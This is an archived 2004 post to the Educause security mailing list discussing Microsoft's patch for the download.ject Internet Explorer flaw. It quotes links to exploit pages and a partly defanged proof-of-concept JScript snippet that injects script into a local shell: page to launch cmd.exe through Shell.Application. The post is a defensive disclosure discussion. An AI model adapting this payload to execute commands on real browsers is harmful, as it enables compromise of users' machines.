Educause Security Discussion mailing list archives

Previous By Date Next
Previous By Thread Next

Re: critical Microsoft fix for download.ject

From: Gary Flynn <flynngn () JMU EDU>
Date: Fri, 2 Jul 2004 17:12:32 -0400
Jordan Wiens wrote:


For the first public discovery and analysis of the new exploits (by
Jelmer; the author who discovered the original adodb.stream issue), see:

http://62.131.86.111/analysis.htm


Note that Jelmer just posted the following to the full disclosure
mailing list in reference to this "critical update": (don't follow
the link with IE)

******************************************************************
Too bad it won't do you one ounce any good

http://62.131.86.111gf/security/idiots/malware2k/installer.htm

Credit: http-equiv
******************************************************************





gf: Through a series of script calls, it eventually gets to:

********************************************************************
function injectIt() {

document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<gfscript
language="JScript" DEFER>var obj=new
ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c
pause");</gfscript>');
}
document.writegf('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
**********************************************************************

My limited understanding of the problem makes me suspect that the
Shell.Application object is used intead of the ADODB stream
object to perform the nasty work after the defect is exploited
so don't get comfortable with IE just yet.

--
Gary Flynn
Security Engineer
James Madison University

**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at 
http://www.educause.edu/cg/.
Previous By Date Next
Previous By Thread Next

Current thread: